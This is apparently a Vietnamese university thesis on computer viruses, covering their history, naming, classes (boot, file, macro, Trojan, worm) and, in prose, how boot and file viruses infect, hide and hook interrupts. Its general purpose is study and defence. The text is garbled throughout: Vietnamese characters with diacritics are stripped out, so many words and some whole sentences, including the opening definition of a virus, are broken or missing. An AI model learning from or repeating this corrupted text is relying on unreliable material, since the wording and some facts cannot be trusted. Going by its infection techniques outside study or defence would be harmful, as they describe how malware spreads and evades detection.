Mc lc

M u .............................................................................................. 3 Li cm n ........................................................................................ 4 Chng 1. TNG QUAN V VIRUS MY TNH...................... 5

1.1. GII THIU V VIRUS MY TNH...5 1.1.1. Virus my tnh v cc tnh cht ................................................... 5 1.1.2. Tn ca virus my tnh ................................................................. 9 1.1.3. Phn loi virus my tnh ............................................................. 11 1.2. BOOT VIRUS.15 1.2.1. Phng php ly lan ................................................................... 15 1.2.2. Phn loi Boot Virus ................................................................... 16 1.2.3. Cu trc chng trnh B-Virus ................................................. 18 1.3. VIRUS FILE...20 1.3.1. Phng php ly lan ................................................................... 20 1.3.2. Phn loi F-Virus ....................................................................... 21 1.3.3. Cu trc chng trnh F-Virus.................................................. 21 1.4. VIRUS MACRO.23 1.4.1. nh ngha .................................................................................... 23 1.4.2. Virus Macro W97M/Antivi.a ..................................................... 24 1.5. TROJAN..26 1.5.1. nh ngha Trojan ....................................................................... 26 1.5.2. Phng php ly nhim Trojan................................................. 26 1.5.3. S nguy him ca Trojan .......................................................... 28 1.5.4. Phn loi Trojan.......................................................................... 28 1.5.5. Mc ch ca Trojan................................................................... 29 1.5.6. Phng thc hot ng ca Trojan .......................................... 30 1.5.7. Cng ca mt s Trojan thng dng ......................................... 31 1.6. INTERNET WORM..32 1.6.1. Gii thiu chung .......................................................................... 32
1

1.6.2. Cc giai on pht trin ca su Internet ................................ 35

Chng 2. NHN DNG V PHT HIN VIRUS .................. 44

2.1. K THUT NHN DNG VIRUS..44 2.1.1. Nhn dng chnh xc mu (Signature based delection) .......... 44 2.1.2. Nhn dng theo m i din ...................................................... 45 2.1.3. Scan theo string ........................................................................... 46 2.1.4. Nhn dng hnh vi ng ng ..................................................... 48 2.1.5. Kim sot lin tc ........................................................................ 49 2.1.6. Kt hp cc phng thc ........................................................... 49 2.2. PHNG PHP PHT HIN VIRUS50 2.2.1. Qut (scanner) ............................................................................. 50 2.2.2. Checksum (kim tra tng) .......................................................... 50 2.2.3. Guard (canh phng) .................................................................... 51

Chng 3. PHNG CHNG VIRUS .......................................... 52

3.1. D TM TRONG B NH...52 1/. i vi B-Virus: ................................................................................ 52 2/. i vi RF-Virus: ............................................................................. 53 3.2. DIT VIRUS V KHI PHC D LIU..53 3.2.1. B-Virus ......................................................................................... 53 3.2.2. F- Virus ........................................................................................ 54 3.2.3. Virus Trojan ................................................................................ 55 3.2.4. Su Worm .................................................................................... 57 3.3. TO VIRUS MY TNH..58

Kt lun........................................................................................... 68

M u
Virus tin hc hin nay ang l ni bn khon lo lng ca nhng ngi lm cng tc tin hc, l ni lo s ca nhng ngi s dng khi my tnh ca mnh b nhim virus. Khi my tnh ca mnh b nhim virus, h ch bit trng ch vo cc phn mm dit virus hin c trn th trng, trong trng hp cc phn mm ny khng pht hin hoc khng tiu dit c, h b lm phi tnh hung rt kh khn, khng bit phi lm nh th no. V l do , c mt cch nhn nhn c bn v h thng, c ch v cc nguyn tc hot ng ca virus tin hc l cn thit. Trn c s , c mt cch nhn ng n v virus tin hc trong vic phng chng, kim tra, cha tr cng nh cch phn tch, nghin cu mt virus mi xut hin. ng vi mi h iu hnh u c nhng loi virus hot ng ring trn n nh ng vi h iu hnh DOS ta c virus DOS, ng vi h iu hnh Windows ta c virus Windows. V s pht trin ca tin hc gn lin vi n l s pht trin ca virus tin hc mi khi c mt phn mm, mt chng trnh, mt h iu hnh mi xut hin th virus mi cng xut hin theo v ko theo l chng trnh dit virus. V vy vic nghin cu, nhn dng v pht hin virus t c bin php thch hp ngn chn v phng tr virus t kt qu cao nht.

Li cm n
Em xin by t lng knh trng v bit n su sc ti PSG.TS Trnh Nht Tin, cc gio vin b mn khoa cng ngh thng tin, i hc Dn Lp Hi Phng hng dn v ng vin em trong qu trnh lm lun vn ny. Em xin cm n cc thy c gio trong trng to iu kin gip em hon thnh lun vn ny. Em xin gi li cm n ti gia nh bn b gip ng vin to iu kin cho em trong qu trnh lm lun vn. V thi gian khng nhiu, kinh nghim cn hn ch, khng trnh khi cc thiu st. Em mong nhn c cc kin ng gp ca cc thy c v bn b Em xin chn thnh cm n

Chng 1. TNG QUAN V VIRUS MY TNH

pht hin v dit c virus tin hc th trc ht phi hiu r bn cht ca chng. V nguyn tc chung, cng vic dit virus tin hc a phn l lm ngc li nhng g m virus lm. V vy, chng ny tp trung nghin cu nhng ni dung lin quan n c ch hot ng ca virus lm r bn cht ca virus tin hc. T c th xy dng chng trnh tm v dit virus.

1.1. GII THIU V VIRUS MY TNH 1.1.1. Virus my tnh v cc tnh cht 1.1.1.1. Khi nim
Virus my

, i kh

tnh .

1.1.1.2. Cc tnh cht

Tnh ly lan: y l tnh cht quan trng nht i vi tt c cc loi virus. Kh nng ly lan th hin sc mnh ca virus. y l im phn bit virus vi mt s chng trnh xu khc cng c kh nng ph hoi d liu v my tnh nhng khng t ly lan c. Tnh n: tnh cht ny lm cho virus trnh c s pht hin ca cc chng trnh anti-virus v tng tc ly nhim, m bo s tn ti ca n. Virus c th gim ti a kch thc ca mnh bng cch ti u ho m lnh ca n hoc s dng mt s gii thut t nn v gii nn. Tuy nhin, iu ny cng
5

c ngha l virus phi gim phc tp ca n, d dng cho cc lp trnh vin phn tch m lnh. Tnh ph hoi: tnh cht ny c th khng c mt s loi virus v n gin chng ch c vit ra th gin hoc kim nghim kh nng ly lan m thi. Tuy nhin, nhiu loi virus c kh nng ph hoi rt cao.

1.1.1.3. Lch s pht trin ca virus my tnh

Virus my tnh c mt qu trnh pht trin kh di, n lun song hnh cng nhng chic my tnh. Khi m cng ngh phn mm cng nh phn cng pht trin th virus my tnh cng pht trin theo. H iu hnh thay i th virus my tnh cng t thay i mnh ph hp vi h iu hnh . C nhiu ti liu khc nhau ni v xut x ca virus my tnh [1,2,3,4]. Tuy nhin, a s cc ti liu ni v xut x ca virus my tnh u lin quan n s kin tr chi Core War.

1983 Nguyn l ca tr chi Core War

Core War l mt cuc u tr gia hai on chng trnh my tnh do hai lp trnh vin vit ra. Mi u th s a mt chng trnh c kh nng t ti to gi l Orgnaism vo b nh my tnh. Khi bt u cuc chi, mi u th s c gng ph hy Organism ca i phng v ti to Organism ca mnh. u th thng cuc l u th t nhn bn c nhiu nht. Tr chi Core War c gi kn n nm 1983, Ken Thompson ngi vit phin bn u tin cho h iu hnh UNIX, l ra khi nhn mt trong nhng gii thng danh d ca gii in ton- gii thng A.M Turing. Trong bi din vn ca mnh ng a ra mt tng v virus my tnh da trn tr chi core war. Cng nm 1983, tin s Frederik Cohen chng minh c s tn ti ca virus my tnh. Thng 5 nm 1984 t bo Scientific America c ng m t v core war v cung cp cho c gi nhng thng tin hng dn v tr chi ny, k t virus my tnh xut hin v i km theo n l cuc chin gia nhng vit ra virus v nhng ngi dit virus.

1986 Virus Brain

C th coi y l virus my tnh u tin trn th gii, Brain b mt thm nhp t Pakistan vo nc M vi mc tiu u tin l trng i hc Delaware. Mt ni khc trn th gii cng m t s xut hin ca virus, l trng i hc Hebrew Israel.

1987 Virus Lehigh

Lehigh l tn ca virus xut hin nm 1987 ti trng i hc cng tn. Trong thi gian ny cng c mt s virus khc xut hin, c bit l WORM virus (su virus), cn c mng vi cc h thng my ch xut hin. Virus Jerusalem gy thit hi cho cng ty IBM vi tc ly lan ng n: 500000 nhn bn trong 1 gi.

1988 Virus ly lan trn mng

Ngy 2/11/1988, Robert Morris a virus vo mng my tnh quan trng nht ca M, gy thit hi ln. T tr i ngi ta bt u thy c tnh nguy hi ca virus my tnh.

1989 Virus AIDS Trojan

Xut hin Trojan hay cn gi l con nga thnh T roa , chng khng phi l virus my tnh, nhng lun i cng vi khi nim virus. Nhng con Trojan ny khi gn vo my tnh th n s ly cp mt s thng tin trn v gi n mt a ch m ch ca ch nga ny mun vn chuyn n, hoc n gin ch l ph hy d liu trn my tnh .

1991 Virus Tequila

y l loi virus u tin m th gii chuyn mn gi l virus a hnh. y thc s l loi virus gy au u cho nhng ngi dit virus v qu tht khng d dng g dit chng. Chng c kh nng t thay i hnh dng sau mi ln ly nhim, lm cho vic pht hin ra chng rt kh khn.

1992- Virus Michelangelo

Tip ni s ra i ca virus a hnh nm 1991, trong nm, 1992 sc mnh cho cc loi virus my tnh tng nhanh chng mt, nhng ngi vit virus to ra s a hnh cc phc tp cho mi virus.
7

1995 Virus Concept

Sau gn 10 nm k t ngy virus my tnh u tin xut hin, y l loi virus u tin c nguyn l hot ng gn nh thay i hon ton so vi virus trc y. Sau ny nhng virus theo nguyn l ca virus Concept c gi chung l macro, chng tn cng vo cc h son tho vn bn ca Microsoft (Word, Excel, Powerpoint) .

1996 Virus Boza

Khi hng Microsoft chuyn sang h iu hnh Window95 v h cho rng virus khng th tn cng c, th nm 1996 xut hin virus Boza ly nhim c trn h iu hnh Windows.

1999 Virus Melissa, Bubbleboy

Mt bc pht trin mi ca virus, su Mellisa khng nhng kt hp cc tnh nng ca su Internet v virus marco m n cn khai thc c mt cng c thng s dng hng ngy l Microsoft Outlook Express. Khi mt my tnh b nhim su Mellisa, n s t pht tn mnh i m ch nhn my tnh khng h hay bit. Trong bn ngy, su Mellisa ly nhim 250 ngn my tnh trn th gii thng qua Internet, trong c Vit Nam, gy thit hi hng trm triu USD. Su Mellisa chng minh Internet l mt phng tin hu hiu virus my tnh c th ly lan trn ton cu trong vi ting ng h. Nm 1999, ngoi su Mellisa, virus Chernobyl hay cn gi l CIH ph hy d liu ca hng triu my tnh trn th gii, gy thit hi gn 1 t USD vo ngy 26/4/1999.

Nm 2000 Virus Dos, Love Letter

C th coi y l v vic virus ph hoi ln nht t trc ti nay, Love Letter c xut x t Philippines do mt sinh vin nc ny to ra, ch trong vng su ting ng h ly nhim ti 20 nc trn th gii trong c Vit Nam, ly nhim 55 triu my tnh gy thit hi 8,7 t USD.

Cn Dos (Denial of Service), nhng virus ny pht tn i khp ni, nm vng nhng ni n ly nhim. Cui cng chng ng lot tn cng theo kiu t chi dch v (Denial of Service yu cu lin tc, t nhiu my tnh ng thi, lm cho cc my ch b tn cng khng th phc v c na v dn n t chi cc yu cu mi) vo cc h thng my ch khi ngi iu hnh n ra lnh, hoc vo cng mt thi im nh trc. Mt h thng in thoi ca Ty Ban Nha l ni b tn cng u tin.

2001 Virus Winux Windows/Linux, Nimda, Code Red

Winux Windows/Linux virus nh du nhng virus c th ly c trn h iu hnh Linux. Nimda, Code Red l nhng virus tn cng cc i tng ca n bng nhiu con ng khc nhau (t my ch sang my ch hoc t my ch sang my trm), cho n thng 9/2002 Vit Nam vn cn nhng c quan vi mng my tnh c hng trm my tnh vn b nhim virus Nimda. Chng ch ra mt xu hng mi ca cc loi virus my tnh l tt c trong mt, trong mt virus bao gm nhiu virus.

2002 S i ca hng lot loi virus mi

Thng 1/2002, virus ly nhim nhng file .SWF. Thng 3/2002 su SharpA (vit bng ngn ng C# ra i). Thng 5/2002 SQLSpider ra i v chng tn cng cc chng trnh dng SQL. Perrun ly nhng file nh .JPEG. Scalper tn cng cc FreeBSD/Apache Web server.

1.1.2. Tn ca virus my tnh

Tn ca virus ni chung thng c t bi nh nghin cu u tin gp virus . Vn l nhiu nh nghin cu c th cng gp nhng virus mi ging nhau nhng cch t tn ca mi ngi th li khc nhau. Vic cc cng ty phn mm an ninh cnh tranh nhau c l n v u tin t tn cho mt loi virus mi dn n tnh trng ph bin hin nay, virus thng c gi bng nhiu danh tnh khc nhau.

Bt ng v tn v cch t tn nhng loi virus to ra nhng iu kh hiu trong lnh vc ny, t dn n nhng kh khn trong bin php i ph v gp phn gip cho virus d dng pht tn. y cng l ch c a ra tho lun ti hi ngh ton cu v chng virus (Virus Bulletin 2003) t chc ti Toronto-Canada cui thng 9/2003. Vo u thp k 1990 c mt h thng quy c cch t tn do T chc nghin cu virus my tnh (CARO) xut. Chnh thc c a ra nm 1991 v thnh thong c b sung thm vo, h thng ny ra nhng nguyn tc v nhng g c th v khng th s dng trong vic t tn cho virus, ng thi thit lp mt h thng cc c trng ca virus nh mc nguy him, nn b tc ng, h hng ca n Nick Fitzgerald, i din ca CARO, khi pht biu v h thng t tn hin nay cho bit nhng nguyn tc ca h vn c hiu lc. Kiu t tn mang tnh k thut th quan trng i vi cc chuyn gia virus, h c th bit c con virus thuc loi no, phin bn th my, thng qua tn gi ca virus. Nhng iu li khng qua trng vi hu ht nhng ngi s dng my tnh, nhng ngi thng c xu hng nh tn virus nh: I Love You v Mellisa (nh tn theo nhng s kin) thay v VBS.LoveLetter.A v W97.Mellisa.A. Tm li: bt ng trong vic t tn cho virus ca nhng nh nghin cu hay cng ty phn mm an ninh mng to ra cho virus cng loi nhiu tn khc nhau. iu to ra s ln ln cho mi ngi nhng i vi phn mm dit virus ch xem xt nhng c im, du hiu nhn bit ca virus m khng h quan tm n tn ca chng trong vic dit virus.

10

1.1.3. Phn loi virus my tnh

Mt cch tng i, Virus tin hc c chia ra thanh nm loi [1]:

Loi 1:Virus Boot (B-Virus)

V mi trng ly nhim ca chng trn Boot Record ca a mm v Master Boot Record hoc Boot Record ca a cng, vng cha mt on m dng khi ng my tnh. Virus loi ny c kch hot mi khi my tnh khi ng t mt a t b nhim chng. Khi c nh thc dy th chng s tin hnh thng tr trong b nh, lng l ch c hi ly lan sang cc a khc thng qua qu trnh truy nhp a.

Loi 2: Virus File(F-Virus)

Thng ly nhim cc file kh thi .EXE, .COM, .DLL, .BIN, .SYS.... Loi virus ny hot ng khi cc file kh thi b nhim virus c thi hnh v ngay lp tc chng s tm cch ly nhim hoc tin hnh thng tr trong b nh v ch c hi ly nhim sang cc file kh thi khc.

Loi 3: Virus Marco

Loi ny khc vi loi virus F-Virus truyn thng ch i tng ly nhim ca chng khng phi l chng trnh kh thi m l cc file vn bn, bng tnhca cc phn mm ng dng c trang b ngn ng marco phc tp to ra nh Microsoft Excel nm trong b phn mm Office ca hng Microsoft. Khi cc tp tin vn bn (hoc cc tp tin Excel) ny c x l bi Microsoft Word (hoc Microsoft Excel), Marco Virus s c kch hot, tm cch ly lan sang cc file Word, Excel khc.

Loi 4: Virus Trojan

Thut ng ny da vo mt in tch c, l cuc chin gia ngi Hy Lp v ngi thnh T-roa. Thnh T-roa l mt thnh tr kin c, qun Hy Lp khng sao c th t nhp vo c. Ngi ta ngh ra mt k, gi v ging ho, sau tng thnh T-roa mt con nga g khng l. Sau khi nga c a vo trong thnh, m xung nhng qun lnh t trong bng nga xng ra v nh chim thnh t bn trong

11

Phng php trn cng chnh l cch m cc Trojan my tnh p dng. u tin hacker bng cch no la cho nn nhn s dng chng trnh ca mnh. Khi chng trnh ny chy th v b ngoi cng ging nh nhng chng trnh bnh thng. Tuy nhin, song song vi qu trnh , mt phn ca Trojan s b mt ci ln my nn nhn. n mt thi im nh trc no chng trnh ny thc hin vic xa d liu, hay gi nhng thng ip m hacker mun ly n mt a ch nh trc trn mng. Khc vi virus, Trojan l mt on m chng trnh hon ton khng c tnh cht ly lan. N ch c th c ci t khi c kch hot v ly nhim c sang my tnh khc khi c ngi c gi i, cn virus th t ng tm kim nn nhn ly lan. Thng thng cc phn mm c cha Trojan c phn phi nh l cc phn mm tin ch, phn mm mi hp dn, nhm d thu ht ngi s dng. Bn cnh cc Trojan n cp thng tin truyn thng, mt s khi nim mi c dng t tn cho cc trojan mang tnh cht ring bit nh sau: BackDoor: L loi trojan (sau khi ci t vo my nn nhn) s t m ra mt cng dch v cho php k tn cng (hacker) c th kt ni t xa ti my nn nhn, t n s nhn lnh v thc hin lnh m k tn cng a ra. Phn mm qung co bt hp php - Adware v phn mm gin ip Spyware: Gy kh chu cho ngi dng khi chng c tnh thay i trang web mc nh (home page), cc trang tm kim mc nh (search page)..hay lin tc t ng hin ra (pop up) cc trang web qung co khi ta ang duyt web. Chng thng b mt xm nhp vo my ca ta khi ta v tnh gh thm nhng trang web c ni dung khng lnh mnh, cc trang web b kha phn mmhoc i theo cc phn mm min ph khng ng tin cy, cc phn mm b kha (crack, keygen).

12

Loi 5: Su Internet (Internet Worm)

Su Internet l mt bc tin ng k ca virus. Su Internet kt hp c s ph hoi ca virus, s b mt ca Trojan v vic ly lan nhanh chng qua ng mng Internet. Vi tc ly lan nhanh chng chng lm t lit hng lot cc h thng my ch, lm ng truyn trn mng qu ti. Su Internet thng c tn pht bng cch tm cc a ch trong s a ch (Address book) ca my m n ang ly nhim, thng l a ch ca ngi thn, khch hngTip n, n t gi bn sao ca n cho nhng a ch m n tm thy, a ch ngi gi thng l ch nhn ca my tnh . iu nguy him l nhng vic ny din ra m ngi s dng khng h hay bit, ch nhn c thng bo l gi virus cho ngi khc th mi bit rng my tnh ca mnh b nhim virus. Vi cch hon ton tng t trn nhng my tnh nn nhn, su Internet c th nhanh chng ly lan trn ton cu theo cp s nhn, iu gii thch ti sao ch trong vng vi ting ng h m su Mellisa v su Love Letter li c th ly lan ti hng chc triu my tnh trn ton cu. Ci tn su Internet th hin vic nhng con su c th b t my tnh ny qua my tnh khc trn cc cnh cy Internet Vi s ly lan nhanh v rng ln nh vy, su Internet thng c k vit ra chng ci thm nhiu tnh nng c bit, chng hn nh chng c th nh cng mt ngy gi v ng lot t cc my tnh nn nhn tn cng vo mt a ch no , rt kh chng v khc phc c hu qu ca nhng cuc tn cng nh vy. Ngoi ra, nhng con su Internet cn c th cho php ch nhn ca chng truy cp vo my tnh ca nn nhn v lm mi th nh ngi trn my tnh mt cch hp php.

13

Khi nim Su Internet cn bao gm cc virus ly lan qua mng chia s ngang hng peer to peer, cc virus ly lan qua cc dch v chatting v c bit l cc virus khai thc cc l hng phn mm ly lan. Cc phn mm (nht l h iu hnh v cc dch v trn ) lun cha ng nhng li tim tng (v d: li trn b m) m khng phi lc no cng c th d dng pht hin ra. Khi mt l hng phn mm c pht hin, khng lu sau s xut hin cc virus c kh nng khai thc cc l hng ny ly nhim ln cc my tnh t xa mt cch m thm m ngi ch my tnh hon ton khng hay bit. T cc my tnh ny, Worm s tip tc b qua cc my tnh khc trn mng Internet vi mt cch thc tng t. Phn loi virus s cung cp cho chng ta mt cch nhn nhn ng n v virus my tnh, t xy dng phng php hu hiu ngn chn chng.

14

1.2. BOOT VIRUS 1.2.1. Phng php ly lan

Sau qu trnh POST (Power On Self Test T kim tra khi khi ng) sector u tin trn a khi ng c c vo b nh ti a ch 0:07C00h, mt tc v kim tra xem c phi l phn Boot hp l khng bng cch kim tra m nhn dng 0AA55h ti cui sector. Tuy nhin vic kim tra ny khng trnh khi s h nu ai thay on m Boot bng mt chng trnh khc vi xu. V y cng chnh l cch ly lan ca mt B-Virus. i vi a mm, sector u tin lun l Boot sector, do vic ly lan ch n gin l tin hnh thay th sector ny bng m ca virus. i vi a cng c chia Partition, vic ly lan li phc tp hn v u tin Master Boot sector c c vo, sau qu trnh kim tra Partition hot ng, Boot sector tng ng mi c c vo. Chnh v vy ngi vit ra virus c th chn mt trong hai ni lu gi m virus: Master Boot sector hay Boot sector. i vi B-Virus c lu tr ti Master th n lun c np vo b nh u tin, cho d sau h iu hnh no c s dng v do n c kh nng ly lan rt rng. Tuy nhin vn t ra l nhng con virus ny phi bo ton Partition table v mt xm phm nh n vng ny cng dn n nhng trc trc v a cng. i vi Boot sector th c thun li hn trong vic s dng bng tham s ca a nm trong vng ny, on m ly lan cho a mm cng s c dng tng t cho a cng. Hai phng php trn u c cc B-Virus s dng, tuy nhin hin nay hu ht chng u s dng phng php ly vo Master Boot sector.

15

Vn then cht m loi virus ny cn gii quyt l Boot sector (Master Boot sector) c ca a. Virus s thc hin vic thay th mt Boot sector mi, tuy nhin virus khng th thc hin c ht cng vic cho Boot sector (Master Boot sector) c v trong sector ny c cha thng tin v a v thc s virus khng th bit mt cch y sector ny s phi lm nhng g. Chnh l do ny m a s cc B-Virus khng b Boot sector c m virus gi Boot sector c vo mt vng no trn a v sau khi tin hnh xong tc v ci t ca mnh, n s c v trao quyn iu khin cho on m ca sector ny (tuy nhin c mt s con virus thc hin m ca mnh ln on m ca Boot sector c ch cha thng tin v a m khng ct sector ny i). Mi vic li c Boot sector c tip tc thi hnh nh bnh thng. Tuy nhin vic la chn ni ct gi Boot sector cng l mt iu kh khn v mi ni trn a u c th b sa i: FAT, Root Directory v nht l vng Data. Da vo cch gii quyt vic ct giu Boot sector c ny B-Virus c th phn thnh hai loi l SB-Virus v DBVirus.

1.2.2. Phn loi Boot Virus

Vic ct gi Boot sector c B-Virus gii quyt theo hai hng: Hng th nht l virus ct Boot sector c vo mt v tr xc nh trn mi a v chp nhn ri ro c th b mt sector ny do ghi , d ch ct du ny c kh nng b ghi thp nht. Hng gii quyt ny n gin v do chng trnh thng khng ln. Ch dng mt sector thay th Boot sector c v do loi ny c gi l SB-Virus (Single Boot Virus). Hng th hai l virus c th ct Boot sector ny vo mt v tr an ton trn a trnh mi mt mt c th xy ra. V kch thc vng an ton c th nh bt k, nn virus thng chim trn nhiu sector v c chia lm hai phn: mt phn trn Boot sector v mt phn trn vng an ton. V c im nh vy, loi virus ny c gi l DB-Virus (Double Boot sector).

16

1/. SB-Virus
Do tnh chp nhn mt mt d liu nn chng trnh ngn gn ch chim mt sector. Thng thng SB-Virus chn nhng ni m kh nng ghi ln l t nht ct Boot sector c. i vi a mm, cc ni thng chn l: - Nhng sector cui cng ca Root Directory v t khi ngi dng khai thc ht s entry ca th mc gc. - Nhng sector cui cng ca a v khi phn phi lin cung cho mt tp tin no , DOS bt u tm lin cung trng t u vng d liu cn c vo entry ca n trn FAT. i vi a cng th n gin hn v trn hu ht cc a track 0 ch cha Master Boot record trn mt sector, cn li cc sector khc trn track ny l b trng khng dng n. Do , cc SB-Virus v hu ht cc DB-Virus u chn nhng sector trng trn track ny lm ni n nu.

2/. DB-Virus
- i vi a s cc virus th kch thc 512 byte (thng thng kch thc ca mt sector l 512 bytes) khng phi l qu rng ri. Do h gii quyt bng cch thay th Boot sector c bng Boot sector gi. Boot sector gi ny lm nhim v ti tip phn m virus cn li trn a vo b nh ri trao quyn iu khin. Sau khi ci t xong phn ny mi ti Boot sector tht vo b nh. Phn m virus cn li c th c nm mt trong nhng ni : - i vi a mm: qua mt DOS bng cch dng nhng lin cung cn trng. Nhng entry tng ng vi cc lin cung ny trn FAT s b nh du l hng cho DOS s khng s dng n na. Phng php th hai u im hn l vt ra khi tm kim sot ca DOS bng cch to thm mt track mi tip theo track cui cng m DOS c th qun l (iu ny ch p dng vi a mm). Tuy nhin phng php ny c nhc im l c mt s loi a mm khng c kh nng qun l, khi track mi c thm s gy li khi virus tin hnh ly lan. Do vy phng php th nht vn c cc virus s dng nhiu hn.

17

- i vi a cng: m virus c th c ct gi ti nhng sector sau Master Boot record hoc nhng sector cui ca Partition sau khi gim kch thc ca Partition i hoc gii quyt tng t nh trn a mm (s dng nhng lin cung cn trng v nh du nhng lin cung ny trong bng FAT l hng cho DOS khng s dng na) . Ni chung cu trc chng trnh SB-Virus hay DB-Virus l nh nhau.

1.2.3. Cu trc chng trnh B-Virus

Do c im ch c trao quyn iu khin mt ln khi khi ng my, virus phi tm mi cch tn ti v c kch hot li khi cn thit, ngha l n ging nh mt chng trnh pop up TSR (Terminate and Stay Resident Kt thc v thng tr). Do vy, chng trnh virus c chia lm hai phn: phn khi to v phn thn.

Phn khi to
u tin virus tin hnh thng tr bng cch t chp mnh vo vng nh cao. Sau m bo tnh pop up ca mnh n lun chim ngt 13h. Ngoi ra, phc v cho cng tc ph hoi, gy nhiuvirus cn c th chim cc ngt 8, 9.Sau khi khi to xong, Boot sector c c tr li ng v tr v trao quyn iu khin.

18

Phn thn
L phn quan trng ca virus, cha cc on m m phn ln s thay th cho cc ngt m n chim. C th chia phn ny thnh bn phn. + Phn ly lan: l phn chnh ca thn virus, thay th cho ngt 13h, c tc dng ly lan bng cch t sao chp mnh vo bt k a no cha b nhim. + Phn gy nhiu v ngy trang: khi bn cht virus c kho st mt cch tng tn th vic pht hin v dit virus khng cn l vn phc tp. Vic gy nhiu to nhiu kh khn cho ngi chng virus trong vic tm, dit virus v phc hi d liu. Vic ngy trang lm cho virus c v b ngoi nh bnh thng ngi dit virus v s dng my tnh khng pht hin ra chng. + Phn ph hoi: khng nht thit phi c. Tuy nhin a s cc virus u c phn ny, hin th ch gy trc chc nh, tru chc ngi dngcn c th ph hy d liu my tnh. Virus c th ph hoi mt cch ngu nhin hoc c nh thi.i vi loi virus c nh thi, virus s kim tra mt gi tr (c th virus xc nh ngy, gi, thng, nm, s ln ly, s gi my chy). Khi gi tr ny bng hoc vt qua ngng cho php n s tin hnh ph hoi. + Phn d liu: ct gi thng tin trung gian, nhng bin ni ti dng ring cho virus v Boot sector c.

19

1.3. VIRUS FILE 1.3.1. Phng php ly lan

Virus file truyn thng ni chung ch tin hnh ly lan trn nhng file thi hnh c (thng l file .com hoc l file .exe). Khi tin hnh ly lan F-Virus truyn thng cng phi tun theo nguyn tc: quyn iu khin phi nm trong tay virus trc khi virus tr n li cho file b nhim (tuy nhin cng c mt s t virus li nm quyn iu khin sau mt s lnh no ca file b nhim). Tt c d liu ca file phi c bo ton sau khi quyn iu khin thuc v file. Cho n nay F-Virus c mt s phng php ly lan c bn sau:

1/. Chn u
Thng thng, phng php ny ch p dng i vi cc file dng .COM ngha l chng trnh lun PSP:100h. Li dng im ny, virus s chn on m ca n vo u file b ly v y ton b file ny xung pha di ngay sau n. u im: m virus d vit v c dng file .COM. Mt khc, s gy kh khn cho ngi dit trong vn khi phc file v phi c ton b file b nhim vo b nh ri tin hnh ghi li. Nhc im: trc khi tr quyn iu khin li cho file phi m bo u vo l PSP:100h, do phi chuyn ton b chng trnh ln a ch ny.

2/. Ni ui
Phng php ny c thy trn hu ht cc loi F-Virus v phm vi ly lan ca n rng hn phng php trn. Theo nh tn ca phng php ny m virus s c gn vo ngay sau file b ly. V do m ca virus khng nm ng u vo chng trnh cho nn n s nh v li file b ly bng cch thay i mt s d liu ca file sao cho u vo ch ng vo m ca n. u im: ly lan trn mi loi file kh thi, thng l file .COM, .EXE, .BIN, .OVL mt khc, s thay i d liu trn file b ly l khng ng k v vic ot quyn iu khin khng my kh khn. Nhc im: d dng cho ngi dit trong vic khi phc d liu v kh nh v m virus khi ly nhim vo file v kch thc file b ly l bt k.
20

3/. vng trng

Phng php ny nhm khc phc nhc im lm tng kch thc file b ly nhim (mt s h m t virus d b pht hin) ca hai phng php trn. Theo phng php ny virus s tm nhng vng trng trong file ri ghi m ca n vo y. u im: gy kh khn trong vic pht hin v dit virus. Nhc im: kh khn trong vic vit m virus v kh nng ly lan hp v rt t file c vng trng cho virus ghi .

1.3.2. Phn loi F-Virus TF Virus (Transient File Virus) :

Virus loi ny khng thng tr, khng chim cc ngt, khi file b ly nhim c thi hnh n s chim quyn iu khin v tranh th tm cch ly lan sang cc file khc cng nhiu cng tt.

RF Virus (Residen File Virus) :

Virus loi ny thng tr bng nhiu k thut khc nhau, chn cc ngt m trng tm ngt l 21h, khi ngt ny c thi hnh ng vi cc chc nng nht nh v file th n s tin hnh ly lan.

1.3.3. Cu trc chng trnh F-Virus 1/. TF-Virus :

Bao gm bn phn: ly lan, gy nhiu, ph hoi v d liu. Phn ly lan: l phn chnh ca virus, c tc dng ly lan bng cch t sao chp mnh gn vo cc file khc m n tm thy khi c quyn iu khin. Do loi ny khng thng tr nn n tm cch ly lan cng nhiu file cng tt khi nm quyn iu khin. Phn gy nhiu: l cng vic lm cho m virus tr nn phc tp kh hiu to nhiu kh khn cho nhng nh chng virus trong vic tm, dit virus v phc hi d liu.

21

Phn ph hoi: tng t nh B Virus Phn d liu: ct gi nhng thng tin trung gian, nhng bin ni ti dng ring cho virus v cc d liu ca file b ly, cc d liu ny s c khi phc cho file trc khi trao li quyn iu khin cho file.

2/. RF-Virus :
V thng tr v chn ngt nh B-Virus cho nn loi ny cng bao gm hai phn chnh: phn khi to v phn thn. Phn khi to: u tin virus tin hnh thng tr bng cch t chp mnh vo b nh hoc dng cc chc nng thng tr ca DOS. Sau m bo tnh pop up ca mnh n s lun chim ngt 21h. Ngoi ra, phc v cho vic ph hoi, gy nhiu, virus cn c th chim cc ngt 8,9,13h Sau khi khi to xong, n s tr li d liu c v quyn iu khin cho file b ly nhim. Phn thn: phn ny c cu trc tng t nh TF-Virus, cng c bn phn: ly lan, gy nhiu, ph hoi v phn d liu. Nhng v loi virus ny thng tr nn phn ly lan s thc hin trn nhng file yu cu c s dng ngt 21h ( b virus chim). Phn gy nhiu ngy trang cng phc tp tinh vi hn TF-Virus v n c th gim st h thng khi thng tr.

22

1.4. VIRUS MACRO 1.4.1. nh ngha

V bn cht virus macro l mt hoc mt s macro (c vit bng ngn ng WordBasic, ExcelBasic, Visual Baisic) c kh nng kch hot v tin hnh ly lan khi ngi dng x l file c tn ti chng. i tng ly nhim u tin ca cc virus marco l nhng file template ngm nh c np u tin mi khi Word hoc Excel khi ng (i vi Word l file NORMAL.DOT) v t y chng tip tc ly lan sang nhng file khc trong nhng ln lm vic v sau. Thng thng, cc virus marco c thi hnh khi ngi dng ch chy chng. Mt khc cc virus marco c th thi hnh mt cch t ng c khi cc virus marco c tn trng vi tn cc marco t ng hoc trng tn vi cc lnh chun ca Word hoc Excel. y chnh l phng php cc virus marco t ng c kch hot v ly lan trong nhng iu kin nht nh. Mt s v d trong Word v nhng lnh chun nh: FileClose, FileOpen, FileSave, FileSaveAs.v nm marco. Cc marco ny s t ng thi hnh khi cng vic tng ng c thc hin. Tn AutoClose AutoStart AutoExit AutoNew AutoOpen T ng thi hnh lnh ng file son tho Khi ng Word Kt thc Word To file vn bn mi M file vn bn

Nh vy, c th ly lan, virus marco lun phi c t nht mt marco thi hnh t ng c. Trong marco ny s c mt on m tin hnh ly lan bng cch t sao chp ton b m virus sang cc file khc. Ngoi ra, virus marco c th c thm cc phn ph hoi, gy nhim v ngy trang.
23

